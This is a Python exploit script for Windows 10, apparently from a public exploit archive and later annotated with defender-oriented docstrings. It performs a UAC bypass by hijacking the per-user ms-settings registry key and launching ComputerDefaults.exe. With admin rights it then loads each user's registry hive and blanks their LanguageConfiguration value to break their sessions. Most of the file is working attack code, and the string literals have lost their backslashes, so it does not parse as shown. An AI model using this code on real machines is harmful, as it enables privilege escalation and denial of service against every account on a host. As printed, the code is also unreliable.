#!/usr/bin/env python
#
# Exploit Title: Windows 10 All Users Session Stuck
# Date: 2018-10-24
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
# Twitter: st0rnpentest
#
# After Microsoft's refusal to consider the issue a security problem, I am disclosing the script
# Vendor Homepage: www.microsoft.com
# Version: Version 10.0.17134.345
# Tested on: Windows 10 pro Version 10.0.17134.345
#

from os import listdir, system, path
from ctypes import *
import _winreg

def create_reg_key(key, value):
    """Create the per-user ms-settings open-command key and set one REG_SZ value in it.

    The key is created under HKEY_CURRENT_USER, so the write needs no
    elevation. `key` is the value name (the caller in this file passes
    'DelegateExecute' and None, i.e. the default value) and `value` is the
    string stored. Any WindowsError is re-raised unchanged.

    NOTE(review): the subkey literal is reproduced as found on the page; its
    path separators appear to have been lost in extraction.

    Defender view: this is the registry half of the UAC bypass the file names
    in bypass_uac() (MITRE ATT&CK T1548.002). A value being set under the
    current user's ms-settings class registration is rare on a normal
    workstation, so registry auditing on that key (Sysmon events 12/13,
    Security event 4657 where a SACL is set) is a high-signal detection.
    """
    try:
        # CreateKey makes the key if it is missing; OpenKey then reopens it
        # with write access for the SetValueEx call.
        _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'SoftwareClassesms-settingsshellopencommand')
        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'SoftwareClassesms-settingsshellopencommand', 0, _winreg.KEY_WRITE)
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
        _winreg.CloseKey(registry_key)
    except WindowsError:
        # Re-raised as-is; the handler adds nothing beyond propagation.
        raise

def exec_bypass_uac(cmd):
    """Write the two registry values the bypass relies on, via create_reg_key().

    First an empty 'DelegateExecute' value, then the key's default value
    (name None) set to `cmd`. Any WindowsError from either write is
    re-raised unchanged.

    Defender view: the pair "DelegateExecute present + default value holding
    a command line" under a per-user class registration is the artefact to
    hunt for. Nothing in this file removes the values afterwards, so they
    remain available for triage after the fact.
    """
    try:
        create_reg_key('DelegateExecute', '')
        create_reg_key(None, cmd)
    except WindowsError:
        raise

def bypass_uac():
    """Register a command that re-runs this script, then launch ComputerDefaults.exe.

    Builds a command line that starts cmd.exe with a Python 2.7 interpreter
    on this script's own path, stores it through exec_bypass_uac(), and then
    starts ComputerDefaults.exe with os.system. Returns 1 on success and
    calls sys.exit(1) on WindowsError.

    NOTE(review): presumably the goal is to have the script run again with
    administrator rights, since the main block only calls this when
    IsUserAnAdmin() is false; the elevation itself happens in Windows and is
    not visible in this file.
    NOTE(review): the string literals are reproduced as found on the page;
    their backslashes appear to have been lost in extraction, so this block
    does not parse as shown.

    Defender view (ATT&CK T1548.002): process-creation telemetry (Sysmon
    event 1, Security event 4688 with command-line logging) showing
    ComputerDefaults.exe as the parent of cmd.exe or a script interpreter is
    the process-side indicator. Setting UAC to "Always notify" and keeping
    day-to-day accounts out of the local Administrators group are the usual
    mitigations for auto-elevation bypasses of this kind.
    """
    try:
        # Path of this script: directory of the resolved file + file name.
        current=path.dirname(path.realpath(__file__)) + '\' + __file__
        # Command stored in the registry: an interactive cmd.exe (/k) that
        # runs the script with a hard-coded Python 2.7 interpreter.
        cmd="C:windowsSystem32cmd.exe /k c:python27python %s" %current
        exec_bypass_uac(cmd)
        system(r'C:windowssystem32ComputerDefaults.exe')
        return 1
    except WindowsError:
        sys.exit(1)

def modify_reg_key(key, value):
    """Set one REG_SZ value in the current user's LanguageConfiguration key.

    Opens the existing key under HKEY_CURRENT_USER with write access (it is
    not created if missing, so OpenKey raises in that case), writes `value`
    under the name `key`, and closes the handle. Any WindowsError is
    re-raised unchanged. The only caller in this file passes ('', '').

    NOTE(review): per the file header the intended result is that the user's
    session becomes stuck; how Windows reacts to the value is not shown here.
    NOTE(review): the subkey literal is reproduced as found on the page; its
    path separators appear to have been lost in extraction.

    Defender view: this write needs no elevation, so it cannot be prevented
    by privilege alone. Registry auditing on the Desktop language
    configuration key, and comparing the value against a known-good
    profile, is how an affected account can be identified and repaired.
    """
    try:
        registry_key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control PanelDesktopLanguageConfiguration', 0, _winreg.KEY_WRITE)
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
        _winreg.CloseKey(registry_key)
    except WindowsError:
        raise


def modify_reg_key_Others(key, value):
    """Set one REG_SZ value in the LanguageConfiguration key of a loaded hive.

    Same write as modify_reg_key(), but against HKEY_USERS under the mount
    name 'w00t'. The main block loads another user's NTUSER.DAT at that name
    with reg.exe before calling this function and unloads it afterwards.
    Any WindowsError is re-raised unchanged.

    NOTE(review): the subkey literal is reproduced as found on the page; its
    path separators appear to have been lost in extraction.

    Defender view: writes under a temporary, oddly named HKEY_USERS mount are
    a sign of offline editing of another account's profile. The change
    persists in that user's NTUSER.DAT after the hive is unloaded, so
    recovery means correcting the value in each affected profile.
    """
    try:
        registry_key = _winreg.OpenKey(_winreg.HKEY_USERS, 'w00tControl PanelDesktopLanguageConfiguration', 0, _winreg.KEY_WRITE)
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
        _winreg.CloseKey(registry_key)
    except WindowsError:
        raise

# Entry point. When the process is already an administrator it edits every
# user profile found under the users directory and then the current user;
# otherwise it calls bypass_uac().
#
# NOTE(review): indentation below is reconstructed, because the page lost it;
# the nesting shown is the only one consistent with the `else:` that follows
# the admin check. The two path literals are reproduced as found and appear
# to have lost characters in extraction, so this block does not parse as
# shown.
#
# Defender view: the admin branch runs `reg.exe LOAD` / `reg.exe UNLOAD`
# once per profile directory. reg.exe loading other users' NTUSER.DAT files
# in a loop is unusual outside profile-migration tooling and is visible in
# process-creation logs (Sysmon event 1, Security event 4688 with
# command-line logging). Restricting who holds local administrator rights
# limits the impact to the current user's own profile.
if __name__ == '__main__':
    try:
        # sys32 is assigned but never used in the visible code.
        sys32="c:\windows\system32\"
        users="c:\users\"
        # Directory entries under the users folder that are not real profiles.
        exclude=["Public", "desktop.ini", "All Users"]

        # Modify all users
        if windll.Shell32.IsUserAnAdmin():
            for i in listdir(users):
                if i not in exclude:
                    # The profile directory name is concatenated into a shell
                    # command line without quoting or validation.
                    system("reg.exe LOAD HKUw00t "+users+i+"NTUSER.DAT")
                    modify_reg_key_Others('', '')
                    system("reg.exe UNLOAD HKUw00t")

            # Modify current user
            modify_reg_key('', '')
        else:
            bypass_uac()
    except WindowsError:
        raise